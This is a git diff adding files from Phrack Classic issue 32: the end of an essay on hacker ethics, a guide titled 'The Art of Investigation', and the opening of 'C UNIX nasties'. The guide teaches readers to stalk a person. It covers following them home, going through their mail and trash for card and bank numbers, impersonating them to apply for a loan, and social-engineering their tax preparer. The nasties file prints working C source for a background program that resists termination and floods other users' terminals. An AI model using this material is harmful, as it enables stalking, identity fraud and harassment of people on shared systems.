+and ``need to know.'' This discrepancy raises an interesting question:
+Does the hacker ethic reflect a growing force in society that stands
+for greater sharing of resources and information -- a reaffirmation
+of basic values in our constitution and laws?  It is important that
+we examine the differences between the standards of hackers, systems
+managers, users, and the public.  These differences may represent
+breakdowns in current practices, and may present new opportunities
+to design better policies and mechanisms for making computer resources
+and information more widely available.
+
+The sentiment for greater information sharing is not restricted to
+hackers.  In the best seller, ``Thriving on Chaos,'' Tom Peters
+(Peters87) writes about sharing within organizations: ``Information
+hoarding, especially by politically motivated, power-seeking staffs,
+has been commonplace throughout American industry, service and
+manufacturing alike.  It will be an impossible millstone around the
+neck of tomorrow's organizations.  Sharing is a must.''  Peters argues
+that information flow and sharing is fundamental to innovation and
+competitiveness.  On a broader scale, Peter Drucker (Drucker89) says
+that the ``control of information by government is no longer possible.
+Indeed, information is now transnational.  Like money, it has no
+`fatherland.' ''
+
+Nor is the sentiment restricted to people outside the computer security
+field.  Harry DeMaio (DeMaio89) says that our natural urge is to
+share information, and that we are suspicious of organizations and
+individuals who are secretive.  He says that information is exchanged
+out of ``want to know'' and mutual accommodation rather than ``need
+to know.''  If this is so, then some of our security policies are
+out of step with the way people work.  Peter Denning (DenningP89)
+says that information sharing will be widespread in the emerging
+worldwide networks of computers and that we need to focus on ``immune
+systems'' that protect against mistakes in our designs and recover
+from damage.
+
+I began my investigation of hackers with the question, who are they
+and what is their culture and discourse?  My investigation uncovered
+some of their concerns, which provided the organizational structure
+to this paper, and several suggestions for new actions that might
+be taken.  My investigation also opened up a broader question:  What
+conflict in society do hackers stand at the battle lines of?  Is
+it owning or restricting information vs. sharing information -- a
+tension between an age-old tradition of controlling information as
+property and the Englightenment tradition of sharing and disseminating
+information?  Is it controlling access based on ``need to know,''
+as determined by the information provider, vs. ``want to know,''
+as determined by the person desiring access?   Is it law enforcement
+vs. freedoms granted under the First and Fourth Amendments?  The
+answers to these questions, as well as those raised by Barlow on
+the nature of information and free speech, are important because
+they tell us whether our policies and practices serve us as well
+as they might.  The issue is not simply hackers vs. system managers
+or law enforcers; it is a much larger question about values and
+practices in an information society.
+
+
+Acknowledgments
+
+I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
+Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
+Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
+Alex for their comments on earlier versions of this paper and helpful
+discussions; to Richard Stallman for putting me in contact with
+hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
+Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
+and Richard Pethia for a summary of some of his experiences at CERT.
+The opinions expressed here, however, are my own and do not necessarily
+represent those of the people mentioned above or of Digital Equipment
+Corporation.
+
+
+References
+
+
+ACM90
+  ``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
+
+Baird87
+  Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
+  Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
+  p. 471-478.
+
+Barlow90
+  John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
+  Earth Review.
+
+Corley89
+  Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
+  Protection, Bantam Books, New York, 1989, p. 67-72.
+
+DeMaio89
+  Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
+  Proc. of the 12th National Computer Security Conference, 1989,
+  p. 630-633.
+
+DenningP89
+  Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
+  Sept.-Oct., 1989.
+
+DenningP90
+  Peter J. Denning, Computers Under Attack, ACM Press, 1990.
+
+Dibbel90
+  Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
+
+Drucker89
+  Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
+
+Felsenstein86
+  Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
+  ACM Panel on Hacking (Lee86).
+
+Frenkel87
+  Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
+  Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
+
+Goldstein89
+  Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
+  Spring 1989.
+
+Goldstein90
+  Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
+  No. 1, Spring 1990.
+
+Goodfellow83
+  Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
+  Transportation, Aviation, and Materials on the Subject of
+  Telecommunications Security and Privacy,'' Sept. 26, 1983.
+
+Hafner90
+  Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
+  p. 15-16.
+
+Harpers90
+  ``Is Computer Hacking a Crime?" Harper's, March 1990, p. 45-57.
+
+Harvey86
+  Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
+  ACM Panel on Hacking (Lee86).
+
+HollingerLanza-Kaduce88
+  Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
+  Criminalization: The Case of Computer Crime Laws,'' Criminology,
+  Vol. 26, No. 1, 1988, p. 101-126.
+
+Huebner89
+  Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
+  Vol. 8, Issue 37, 1989.
+
+Landreth89
+  Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
+
+Lee86
+  John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
+  Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
+  Vol. 29, No. 4, April 1986, p. 297-299; full report available from
+  ACM Headquarters, New York.
+
+Levy84
+  Steven Levy, Hackers, Dell, New York, 1984.
+
+Markoff90
+  John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
+  The New York Times, March 19, 1990.
+
+Markoff90a
+  John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
+  The New York Times, June 3, 1990.
+
+Martin89
+  Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
+  Proc. of the 12th National Computer Security Conference, 1989.
+
+Meyer89
+  Gordon R. Meyer, The Social Organization of the Computer Underground,
+  Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
+  1989.
+
+MeyerThomas90
+  Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
+  A Postmodernist Interpretation of the Computer Underground,'' Dept.
+  of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
+
+Peters87
+  Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
+  p. 610, 1987.
+
+Spafford89
+  Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
+  Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
+
+Stallman84
+  Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
+  No. 1, Jan. 1984, p. 8-9.
+
+Stallman90
+  Richard M. Stallman, ``Against User Interface Copyright'' to appear
+  in Comm. ACM.
+
+Steele83
+  Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
+  Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow,  The
+  Hacker's Dictionary, Harper & Row, New York, 1983.
+
+Stoll90
+  Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
+
+Thomas90
+  Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
+  Digest, Issue #1.06, April 27, 1990.
+
+ThomasMeyer90
+  Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
+  (Witch)Hunting for the Computer Underground,''  Unpublished
+  manuscript, Department of Sociology, Northern Illinois University,
+  DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
+  1, Issue 11, June 16, 1990.
+
+_______________________________________________________________________________
diff --git a/phrack32/4.txt b/phrack32/4.txt
new file mode 100644
index 0000000..d13aca2
--- /dev/null
+++ b/phrack32/4.txt
@@ -0,0 +1,414 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #4 of 12
+
+
+*****         T H E    A R T    O F    I N V E S T I G A T I O N         *****
+*****                                                                    *****
+*****                                                                    *****
+*****                       Brought to You By                            *****
+*****                                                                    *****
+*****                          The Butler                                *****
+*****                                                                    *****
+*****                           10/31/90                                 *****
+*****                                                                    *****
+*****                                                                    *****
+
+There are many ways to obtain information about individuals.  I am going to
+cover some of the investigative means of getting the low down on people whom
+you wish to know more about.
+
+Some of the areas I will cover are:
+
+Social Security Checks
+Driving/Vehicular Records
+Police Reports
+FBI Records
+Insurance Records
+Legal Records
+Credit Bureau Checks
+Probate Records
+Real Estate Records
+Corporate Records
+Freedom Of Information Act
+Governmental Agency Records
+Maps
+Tax Records
+
+To obtain information from some organizations or some individuals one must be
+able to "BULLSHIT"!!! Not only by voice but in writing.  Many times you must
+write certain governmental bodies requesting info and it can only be done in
+writing.  I can't stress enough the need for proper grammer and spelling.
+
+For you to obtain certain information about another person you must first
+get a few KEY pieces of info to make your investigation easier.  The persons
+Full Name, Social Security Number, Date & Place of Birth will all make your
+search easier and more complete.
+
+First of all in most cases you will know the persons name you want to invest-
+igate.  If not you must obtain it any way you can.  First you could follow them
+to their home and get their address.  Then some other time when they are gone
+you could look at their mail or dig through their trash to get their Full Name.
+While in their trash you might even be able to dig up more interesting info
+like:  Bank Accout Numbers, Credit Card Numbers, Social Security Number, Birth
+Day, Relatives Names, Long Distance Calls Made, etc.
+
+If you can't get to their trash for some reason take their address to your
+local library and check it against the POLKS and COLES Directories.  This
+should provide you with their Full Name, Phone Number, Address, and how long
+they have lived at the current location.
+
+You can also check the Local Phone Book, Directory Assistance, City Directories,
+Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
+electric, phone, cable, etc.)
+
+If you know someone who works at a bank or car dealer you could have them run
+a credit check which will reveal all of their credit cards and if they have
+ever had any late payments or applied for any loans. If you are brave enough
+you could even apply for a loan impersonating the individual under investigation
+
+The Credit Bureau also has Sentry Services that can provide deceased social
+security numbers, postal drop box address and known fraudulent information.
+
+You can get an individuals driving record by sending a letter to your states
+Department of Revenue, Division of Vehicles.  You can also get the following:
+
+Driver Control Bureau
+For Driving Record send Name, Address, Date of Birth and usually a $1 process-
+ing fee for a 5 year record.
+
+Titles & Registration Bureau
+For ownership information (current and past).
+
+Driver License Examination Bureau
+To see what vision was rated.
+
+Motor Carrier Inspection & Registration Bureau
+To check on licensing and registration of trucks/trucking companies.
+
+Revocation Dept
+Can verify if someone's driver's license has ever been suspended or revoked.
+
+You can even obtain a complete vehicle history by sending the vehicle descrip-
+tion, identification # for the last registered owner, and a small fee.  Send
+this info to your states Dept of Vehicles.  It is best to contact them first
+to get their exact address and fees.  I would advise using a money orders and
+a P.O. Box so they cannot trace it to you without a hassle.
+
+Police Records
+
+All Police and Fire Records are Public record unless the city is involved.
+You can usually get everything available from the police dept including:
+Interviews, maps, diagrams, misc reports, etc.
+
+
+FBI Records
+
+If the individual you are inquiring about is deceased the FBI will provide
+some info if you give them Full Name, SSN, Date & Place of Birth.  Contact
+you local FBI office to get the details.
+
+
+Real Estate Records
+
+Recorder of Deeds offices in each county maintain land ownership records.
+Most are not computerized and you have to manually search.  Then you must
+review microfilm/fiche for actual deeds of trust, quit claim deeds,
+assignments, mortgage, liens, etc.
+
+A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
+which will show ownership, mortgage info, easements, taxes owned, taxes
+assessed, etc.
+
+Most county assessors will provide an address and value of any real property
+if you request a search by name.
+
+
+Social Security Records
+
+Social Security Administrator
+Office of Central Records Operations
+300 North Greene Street
+Baltimore, Maryland 21201
+301-965-8882
+
+Title II and Title XVI disability claims records, info regarding total earnings
+for each year, detailed earnings information show employer, total earnings, and
+social security paid for each quarter by employer.
+
+Prices are approximately as follows:
+
+1st year of records                        $15.00
+2nd-5th year of records                    $ 2.50 per person
+6th-10th year of records                   $ 2.00 per person
+11th-15th year of records                  $ 1.50 per person
+16th-on year of records                    $ 1.00 per person
+
+**  Call for verification of these prices.  **
+
+Social Security records are a great source of information when someone has
+been relatively transient in their work, or if they are employed out of a
+union hall.
+
+If you want to review a claim file, direct your request to the Baltimore
+office.  They will send the file to the social security office in your city
+for you to review and decide what you want copies of.
+
+The first three digits of a social security number indicate the state of
+application.
+
+                 The Social Security Number
+
+SSA has continually emphasized the fact that the SSN identifies a particular
+record only and the Social Security Card indicates the person whose record is
+identified by that number. In no way can the Social Security Card identify
+the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
+on the face of the card.  However, many people ignored the message and the
+legend was eventually dropped.  The social security number is the most widely
+used and carefully controlled number in the country, which makes it an
+attractive identifier.
+
+With the exception of the restrictions imposed on Federal and some State and
+local organizations by the Privacy Act of 1974, organizations requiring a
+unique identifier for purposes of controlling their records are not prohibited
+from using (with the consent of the holder) the SSN. SSA records are
+confidential and knowledge of a person's SSN does not give the user access to
+information in SSA files which is confidential by law.
+
+Many commercial enterprises have used the SSN in various promotional efforts.
+These uses are not authorized by SSA, but SSA has no authority to prohibit
+such activities as most are not illegal. Some of these unauthorized uses are:
+SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
+pocketbook numbers (the numbers used on sample social security cards in
+wallets); misleading advertising, commercial enterprises charging fees for SSN
+services; identification of personal property.
+
+The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
+the Area, Group, and Serial.  For the most part, (there are exceptions), the
+Area is determined by where the individual APPLIED for the SSN (before 1972)
+or RESIDED at time of application (after 1972). The areas are assigned as
+follows:
+
+000     unused   387-399 WI    528-529 UT
+001-003 NH       400-407 KY    530     NV
+004-007 ME       408-415 TN    531-539 WA
+008-009 VT       416-424 AL    540-544 OR
+010-034 MA       425-428 MS    545-573 CA
+035-039 RI       429-432 AR    574     AK
+040-049 CT       433-439 LA    575-576 HI
+050-134 NY       440-448 OK    577-579 DC
+135-158 NJ       449-467 TX    580     VI Virgin Islands
+159-211 PA       468-477 MN    581-584 PR Puerto Rico
+212-220 MD       478-485 IA    585     NM
+221-222 DE       486-500 MO    586     PI Pacific Islands*
+223-231 VA       501-502 ND    587-588 MS
+232-236 WV       503-504 SD    589-595 FL
+237-246 NC       505-508 NE    596-599 PR Puerto Rico
+247-251 SC       509-515 KS    600-601 AZ
+252-260 GA       516-517 MT    602-626 CA
+261-267 FL       518-519 ID    *Guam, American Samoa,
+268-302 OH       520     WY     Northern Mariana Islands,
+303-317 IN       521-524 CO     Philippine Islands
+318-361 IL       525     NM
+362-386 MI       526-527 AZ
+
+627-699 unassigned, for future use
+
+700-728 Railroad workers through 1963, then discontinued
+729-899 unassigned, for future use
+900-999 not valid SSNs, but were used for program purposes
+          when state aid to the aged, blind and disabled was
+          converted to a federal program administered by SSA.
+
+As the Areas assigned to a locality are exhausted, new areas from the pool are
+assigned.  This is why some states have non-contiguous groups of Areas.
+
+The Group portion of the SSN has no meaning other than to determine whether or
+not a number has been assigned. SSA publishes a list every month of the
+highest group assigned for each SSN Area.  The order of assignment for the
+Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
+except for 00 which is never used, and odd numbers over 10. For example, if the
+highest group assigned for area 999 is 72, then we know that the number
+999-04-1234 is an invalid number because even Groups under 9 have not yet been
+assigned.
+
+The Serial portion of the SSN has no meaning. The Serial is not assigned in
+strictly numerical order. The Serial 0000 is never assigned.
+
+Before 1973, Social Security Cards with pre-printed numbers were issued to
+each local SSA office. The numbers were assigned by the local office. In 1973,
+SSN assignment was automated and outstanding stocks of pre-printed cards were
+destroyed.  All SSNs are now assigned by computer from headquarters.  There
+are rare cases in which the computer system can be forced to accept a manual
+assignment such as a person refusing a number with 666 in it.
+
+A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
+an explanation of the SSN's structure and the method of assigning and
+validating Social Security numbers.
+
+
+Tax Records
+
+If you can find out who does the individuals taxes you might be able to get
+copies from them with the use of creative social engineering.
+
+If you want to run a tax lien search there is a service called Infoquest.
+1-800-777-8567 for a fee.  Call with a specific request.
+
+
+Post Office Records
+
+If you have an address for someone that is not current, always consider writing
+a letter to the postmaster of whatever post office branch services the zip code
+of the missing person.  Provide them the name and the last known address and
+simply ask for the current address.  There might be a $1 fee for this so it
+would be wise to call first.
+
+City Directory, Polk's, Cole's, etc.
+
+Information in these directories is contained alphabetically by name,
+geographically by street address, and numerically by telephone number, so if
+you have any of those three pieces of info, a check can be done.  The Polk's
+directory also shows whether the person owns their home or rents, their marital
+status, place of employment, and a myriad of other tidbits of information.
+However, these books are not the be-all and end-all of the information as they
+are subject to public and corporate response to surveys.  These directories are
+published on a nationwide basis so if you are looking for someone outside of
+your area, simply call the public library in the area you have an interest and
+they also can perform a crisscross check for you.
+
+You can also call a service owned by Cole's called the National Look up Library
+at 402-473-9717 and either give a phone number and get the name & address or
+give the address and get the name and phone number.  This is only available to
+subscribers, which costs $183.00 dollars for 1991.  A subscriber gets two free
+lookups per day and everyone after that costs $1.25.  A subscriber can also mail
+in a request for a lookup to:
+
+National Look Up Library
+901 W. Bond Street
+Lincoln, NE 68521-3694
+
+A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
+detailed financial analysis of any bank.
+
+505 Barton Springs Road
+Austin, Texas 78704
+512-472-2244
+
+Professional Credit Checker & Nationwide SSN-locate.
+
+!Solutions! Publishing Co.
+8016 Plainfield Road
+Cincinnati, Ohio 45236
+513-891-6145
+1-800-255-6643
+
+Top Secret Manuals
+
+Consumertronics
+2011 Crescent Drive
+P.O. Drawer 537-X
+Alamogordo, New Mexico 88310
+505-434-0234
+
+
+Federal Government Information Center is located at
+
+1520 Market Street
+St. Louis, Missouri
+1-800-392-7711
+
+
+U.S. Dept of Agriculture has located aerial photos of every inch of the United
+States.
+
+2222 West 2300 S.
+P.O. Box 36010
+Salt Lake City, Utah 84130
+801-524-5856
+
+
+To obtain general information regarding registered agent, principals, and good
+standing  status, simply call the Corporate Division of the Secretary of State
+and they will provide that information over the phone.  Some corporate divisions
+are here:
+
+Arkansas Corporate Division   501-371-5151
+Deleware Corporate Division   302-736-3073
+Georgia Corporate Division    404-656-2817
+Indiana Corporate Division    317-232-6576
+Kansas Corporate Division     913-296-2236
+Louisiana Corporate Division  504-925-4716
+Missouri Corporate Division   314-751-4936
+New York Corporate Division   518-474-6200
+Texas Corporate Division      512-475-3551
+
+
+Freedom Of Information
+
+The Freedom of Information Act allows the public to request information
+submitted to, or generated by, all executive departments, military departments,
+government or government controlled corporations, and regulatory agencies. Each
+agency, as described above, publishes in the Federal Register, descriptions of
+its central and field organizations and places where and how requests are to be
+directed. Direct a letter to the appropriate person designated in the Federal
+Register requesting reasonably described records be released to you pursuant to
+the Freedom of Information Act.  Be sure to follow each agency's individually
+published rules which state the time, place, fees, and procedures for the
+provisions of information.  The agency should promptly respond.
+
+How to Find Information About Companies, Ed. II, 1981, suggests, "Government
+personnel you deal with sometimes become less helpful if you approach the
+subject by threatening the Freedom of Information Act action - it's best to ask
+for the material informally first."  While this will probably enable you to find
+the correct person to send your request to, be prepared to spend at least half
+an hour on the phone talking to several people before you find the person who
+can help you.  The book also has a brief description of what each governmental
+agency handles.
+
+If you want to see if someone you are trying to locate is a veteran, has a
+federal VA loan, or receives some sort of disability benefit, use Freedom
+of Information and provide the person's SSN.
+
+You will get a bill but you can ask for a fee waiver if this contributes to a
+public understanding of the operation of the government.  You can also request
+an opportunity to go through the files yourself and then decide what you want
+copied.
+
+
+Insurance Records
+
+PIP carrier records (may contain statements, medical records, new doctors/
+hospital names,  records of disability payments, adjuster's opinions,
+applications for insurance coverage, other claim info, etc.)
+
+Health insurance records (may contain medical records, record of bills, new
+doctors/hospital names, pre-existing conditions information, info regarding
+other accidetns/injuries, etc.)
+
+Often you will have to go through the claims office, the underwriting dept, and
+the business office to get complete records as each individual dept maintains
+its own seperate files.
+
+
+Workers Compensation
+
+Some states will let you simply request records.  Just submit your request
+including the SSN and Birthdate, to the Department of Human Resources, Division
+of Worker's Compensation.  They will photocopy the records and send you the
+copies.  Other states require an authorization to obtain these records.
+
+
+You can always call your local Private Investigator pretending you are a
+student doing a research paper on the methods of getting personal information
+about people or even trash his place to find tips on tracking down people.
+
+I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
+by The Butler will...........
+
+
+                                        Till Next Time,
+
+
+                                        The Butler...
+_______________________________________________________________________________
diff --git a/phrack32/5.txt b/phrack32/5.txt
new file mode 100644
index 0000000..cdbe8be
--- /dev/null
+++ b/phrack32/5.txt
@@ -0,0 +1,909 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #5 of 12
+
+
+        *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
+        %P                                                           P%
+        %H                  C UNIX `nasties' PART I                  H%
+        %A                            by                             A%
+        %Z             Sir Hackalot of PHAZE (10/20/90)              Z%
+        %E                                                           E%
+        *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
+
+
+o Purpose of this file:
+
+        The purpose of this file is to share small C programs for the Unix
+        System V and/or BSD 4.3 operating systems which as in logical terms,
+        "Nasty".  This "Nasty" can be termed better as Annoyance programs
+        or tricky programs.
+
+        The purpose of this text however, is NOT to teach one how to program
+        in C and or how to use the C compiler on Unix systems.  This textfile
+        assumes you have a working knowledge of programming with C in the
+        UNIX environment.
+
+
+
+o The UTMP Reader:
+  ~~~~~~~~~~~~~~~~
+
+        First, I would like to start this text off by posting in a generic
+        /etc/utmp reader.  The /etc/utmp reader is essential for applications
+        that deal with all the users online at a given time.
+
+        Here is the source:
+
+- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
+
+
+/* WhatTTY -- Generic WHO
+UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
+
+This is basically a skeleton program that is just a base for any UTMP
+operations.
+
+This is the skeleton that PhaZe(soft) uses for anything that deals
+with reading the utmp file, such as MBS, SEND, VW, MME, and other
+utilities.
+
+Applications: You can use this when you need to do something to
+everyone online, or when you need some sort of data from utmp, wtmp
+or any file that is like utmp.
+*/
+
+#include <stdio.h>
+#include <sys/types.h> /* This is the key to the whole thing */
+#include <utmp.h>
+#include <fcntl.h>
+
+
+main()
+{
+        int handle;
+        char *etc = "/etc/utmp";
+        struct utmp user;
+
+        handle = open(etc,O_RDONLY);
+
+        while(read(handle,&user,sizeof(user)) != 0) {
+                if (user.ut_type == USER_PROCESS)
+                printf("%s is on %s\n",user.ut_name,user.ut_line);
+        }
+        close(handle);
+
+/* Simple, Right? */
+/* To see anything that is waiting for a login, change USER_PROCESS
+to LOGIN_PROCESS */
+}
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+        In the above program, this is what happens:
+        1.  I assigned the variable "etc" to point at the string
+                "/etc/utmp", which is the utmp file.
+        2.  I opened in in Read ONLY mode (O_RDONLY).
+        3.  I started a loop that does not end until 0 bytes are
+            read into the user structure.  The 0 bytes would mean
+            end of file.
+
+        Notice the line:
+        if (user.ut_type == USER_PROCESS)
+
+        What the above line does is to distinguish between a user
+        and a terminal waiting for a Login.  The ut_type is defined
+        in utmp.h.  There are many types.  One of them is LOGIN_PROCESS.
+        That will be a terminal waiting for a login.  If you wanted to see
+        all the TTYs waiting to be logged in on, you would change the
+        USER_PROCESS to LOGIN_PROCESS.  Other types are things like
+        INIT_PROCESS.  You can just look in utmp.h to see them.
+
+        Also notice that I have inclide "sys/types.h".  If you do not include
+        this file, there will be an error in utmp.h, and other headers.
+        types.h has definitions for other TYPES of data, etc.  So, if in
+        a header file you encounter a syntax error, you might need to include
+        sys/types.h
+
+        This program is just a skeleton, although it does print out who
+        is logged on, and to what TTY they are on.  You will see how this
+        skeleton I wrote can be used.  I used it to write MBS.
+
+_______________________________________________________________________________
+
+
+o MBS -- Mass BackSpace virus:
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+        MBS may not be considered a virus, since it does not replicate
+        itself.  However, it does "infect" every user that logs in, provided
+        the conditions are right.
+
+        The MBS virus uses the utmp reader to constantly read the utmp
+        file to find its next victim. Thus, eventually getting everyone, then
+        recycling to start again. Therefore catching people who login after
+        it is started.
+
+        Lets look at the source:
+
+- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <utmp.h>
+#include <fcntl.h>
+#include <signal.h>
+/*
+   MBS - Mass BackSpace Virus!! v2.2 Deluxe+
+   (c) 1990 - Sir Hackalot
+   PhaZeSOFT Ltd.
+
+*/
+
+char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
+int maxitem = 5; /* Should be total # of immune dudes */
+int truefalse = 0;
+int warn[10],bad;
+char full_tty[15], text[160],  kstr[80];
+FILE *to_tty, *strm;
+struct utmp u;
+
+
+void kmes(fmt,boo)
+char *fmt;
+int boo;
+{
+        if (boo != 0) {
+                printf("MBS_KERN: ");
+                printf("%s",fmt);
+        }
+        if (boo == 0) {
+                sprintf(full_tty,"/dev/%s",u.ut_line);
+                to_tty = fopen(full_tty,"w");
+                fprintf(to_tty,"MBS_KERN: %s",fmt);
+                fclose(to_tty);
+        }
+}
+
+void initit() {  /* Initialize our little "kernel" */
+        int xxx = 0;
+        strcpy(ent[0],"technic");
+        strcpy(ent[1],"merlin");
+        strcpy(ent[2],"datawiz");
+        strcpy(ent[3],"par");
+        strcpy(ent[4],"Epsilon");
+        while (xxx < 11) {
+                warn[xxx] = 0;
+                xxx++;
+        }
+        kmes("Kernel Started.\n",1);
+}
+
+void warnem(wcnt) /* Notify all the immune people ... */
+int wcnt;
+{
+        if (bad == 0) { /* keep from dumping core to disk */
+                if (warn[wcnt] < 2) {
+                        sprintf(kstr,"%s has started a backspace virus!\n",getlo
+                        kmes(kstr,0);
+                        warn[wcnt]++;
+                }
+        }
+}
+
+
+int checkent(uname) /* Check for immunity */
+char *uname;
+{
+        int cnt = 0;
+        truefalse = 0; /* assume NOT immune */
+        while (cnt < maxitem) {
+                if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
+                        truefalse = 1;
+                        warn[cnt]++; /* increment warning variable */
+                        warnem(cnt); /* warn him if we have not */
+                }
+
+                cnt++;
+        }
+        return(truefalse); /* return immunity stat. 1=immune, 0 = not */
+}
+
+
+/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
+to intercept it, and notify use */
+void sig_hand(sig)
+int sig;
+{
+if(sig == 3) kmes("Ignoring Interrupt\n",1);
+if(sig == 15) kmes("Ignoring Termination Signal\n",1);
+if(sig == 4) kmes("Ignoring quit signal.\n",1);
+        }
+
+main(argc,argv)
+int argc;
+char *argv[];
+
+{
+        int prio,pid,isg,handle;
+        char buf[80];
+        char name[20],tty[20],time[20];
+        initit();
+        if (argc < 2) prio = 20;
+        if (argc == 2) prio = atoi(argv[1]);
+        if ((pid = fork()) > 0) {
+        printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
+                printf("Another Fine PhaZeSOFT production\n");
+                printf("Thanks to The DataWizard for Testing this\n");
+                printf("Hello to The Conflict\n");
+                sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
+                kmes(kstr,1);
+                exit(0); /* KILL MOTHER PID, return to Shell & go background */
+        }
+        nice(prio);
+        signal(SIGQUIT,sig_hand);
+        signal(SIGINT,sig_hand);
+        signal(SIGTERM,sig_hand);
+        /* That makes sure you HAVE to do a -9 or -10 to kill this thing.
+           Sometimes, hitting control-c will kill of background processes!
+           Add this line if you want it to continue after you hangup:
+           signal(SIGHUP,SIG_IGN);
+doing it will have the same effect as using NOHUP to
+to execute it. Get it? Nohup = no SIGHUP
+*/
+        while(1) {  /* "Kernel" Begins here and never ends */
+                handle = open("/etc/utmp",O_RDONLY);
+                while (read(handle,&u,sizeof(u)) != 0) {
+                        bad = 0;
+                        sprintf(full_tty,"/dev/%s",u.ut_line);
+                        if (strcmp(u.ut_name,getlogin()) != 0) {
+
+         /* Fix: Below is a line that optimizes the hosing/immune process
+            It skips the utmp entry if it is not a user.  If it is, it
+            checks for immunity, then comes back. This is alot faster
+            and does not wear down cpu time/power */
+
+               if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
+               else isg = 1;
+                 if (isg != 1) {
+                                        if((to_tty = fopen(full_tty,"w")) == NUL
+                                                bad = 1;
+                                        }
+                                        if (bad == 0) {
+                                                fprintf (to_tty, "\b\b\b");
+                                                fflush (to_tty);
+                                        }
+                                        fclose(to_tty);
+                                }
+                        }
+                }
+                close (handle);
+        }
+}
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+        I am going to try to take this bit by bit and explain how it works
+        so that maybe you can come up with some good ideas on creating
+        something similar.
+
+        I will start with the MAIN function.  Here it is:
+
+___
+
+main(argc,argv)
+int argc;
+char *argv[];
+
+{
+        int prio,pid,isg,handle;
+        char buf[80];
+        char name[20],tty[20],time[20];
+        initit();
+___
+
+        Obviously, this is the part of the code which initializes the main
+        variables used.  The "main(argc,argv)" is there so it can accept
+        command line parameters.  The command line parameters are just
+        for speed customization, which I will discuss later.  Notice how
+        the variables are defined for the command line parameters:
+
+        int argc, char *argv[];
+
+        argc is the number of arguments, INCLUDING the name of the current
+        executable running.  argv[] holds the strings in an array which make
+        up the parameters passed.  argv[0] holds the name of the program,
+        while argv[1] holds the 1st parameter entered on the command line.
+        initit() is called to set up the necessary tables.  All of
+        the variables defined at the top of the program are global, and alot
+        of these functions use the global variables, as does initit();.
+
+___
+
+if (argc < 2) prio = 20;
+if (argc == 2) prio = atoi(argv[1]);
+___
+
